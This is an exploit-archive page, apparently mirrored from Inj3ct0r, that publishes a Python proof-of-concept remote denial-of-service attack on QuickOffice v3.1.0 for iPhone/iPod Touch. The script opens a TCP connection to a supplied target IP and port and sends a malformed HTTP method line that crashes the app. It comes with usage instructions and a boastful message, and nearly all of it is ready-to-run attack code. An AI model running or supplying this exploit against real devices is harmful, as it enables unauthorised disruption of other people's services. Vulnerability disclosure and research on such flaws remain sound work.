Home / os / win7

QuickOffice v3.1.0 for iPhone/iPod Touch Malformed HTTP Meth

Posted on 14 June 2010

<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01 Transitional//EN'><html><head><meta http-equiv='Content-Type' content='text/html; charset=windows-1251'><title>QuickOffice v3.1.0 for iPhone/iPod Touch Malformed HTTP Method DoS</title><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon'><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss'></head><body><pre>=========================================================================
QuickOffice v3.1.0 for iPhone/iPod Touch Malformed HTTP Method Remote DoS
=========================================================================


# Exploit: QuickOffice v3.1.0 for iPhone/iPod Touch Malformed HTTP Method Remote DoS
# Date: 14/06/2010
# Author: Nishant Das Patnaik
# Website: http://nishantdaspatnaik.yolasite.com
# Software Link: http://itunes.apple.com/us/app/quickoffice-connect/id304673686?mt=8
# Version: 3.1.0
# Tested on: iPod 2G with iOS v3.1.3
# Note: QuickOffice Connect v3.1.0 and prior program versions may be also vulnerable.
 
 
#!/usr/bin/env python
import os
import sys
import socket
def main(argv):
    argc = len(argv)
    if argc != 3:
        print &quot;Usage: %s &lt;target-ip&gt; &lt;target-port&gt;&quot; % (argv[0])
        sys.exit(0)
    host = argv[1]
    port = int(argv[2])
    print &quot;[+] Connecting: %s:%d&quot; % (host, port)
    payload = &quot;. / HTTP/1.1

&quot;
    sd = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    sd.connect((host, port))
    print &quot;[+] Sending payload...&quot;
    print &quot;[+] Did you see that b00m? http://nishantdaspatnaik.yolasite.com&quot;
    sd.send(payload)
    sd.close()
if __name__ == &quot;__main__&quot;:
    main(sys.argv)
    sys.exit(0)


# <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-06-14]</pre><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></body></html>

 

TOP

Malware :

Exploits :